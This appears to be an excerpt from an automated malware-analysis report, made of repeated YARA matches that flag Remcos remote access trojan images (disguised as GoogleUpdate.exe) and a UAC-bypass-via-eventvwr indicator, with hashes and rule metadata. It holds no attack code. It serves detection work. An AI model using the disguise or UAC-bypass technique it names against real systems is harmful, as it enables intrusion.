                  Source: 27.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 27.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                  Source: 22.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 22.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 22.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                  Source: 15.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 15.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 15.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                  Source: 25.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 25.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 25.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                  Source: 10.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 10.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 10.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                  Source: 15.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 15.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 15.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                  Source: 0.0.DB5rQYsfd6.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 0.0.DB5rQYsfd6.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 0.0.DB5rQYsfd6.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                  Source: 27.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 27.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 27.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                  Source: 0.2.DB5rQYsfd6.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 0.2.DB5rQYsfd6.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 0.2.DB5rQYsfd6.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                  Source: 10.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 10.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 20.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 10.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                  Source: 20.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 20.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                  Source: 25.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 25.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 25.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                  Source: 10.2.GoogleUpdate.exe.6abe60.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 10.2.GoogleUpdate.exe.6abe60.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 10.2.GoogleUpdate.exe.6abe60.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                  Source: 10.2.GoogleUpdate.exe.2a00000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 10.2.GoogleUpdate.exe.2a00000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 10.2.GoogleUpdate.exe.2a00000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                  Source: 18.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 18.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 18.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                  Source: 10.2.GoogleUpdate.exe.6abe60.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 10.2.GoogleUpdate.exe.6abe60.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 10.2.GoogleUpdate.exe.6abe60.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                  Source: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000016.00000002.1840917255.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000000.00000000.1664470390.0000000000456000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 0000000F.00000002.1756643993.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000019.00000002.1917821912.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000014.00000000.1836764394.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 0000000D.00000002.4123857872.0000000003230000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 0000001B.00000000.1919217572.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 0000001B.00000002.1919786507.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000014.00000002.1837263021.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000012.00000000.1762040408.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000000.00000003.1665273424.000000000054C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000016.00000000.1840006735.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000019.00000000.1917703042.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000012.00000002.1762879487.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 0000000A.00000000.1689947215.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
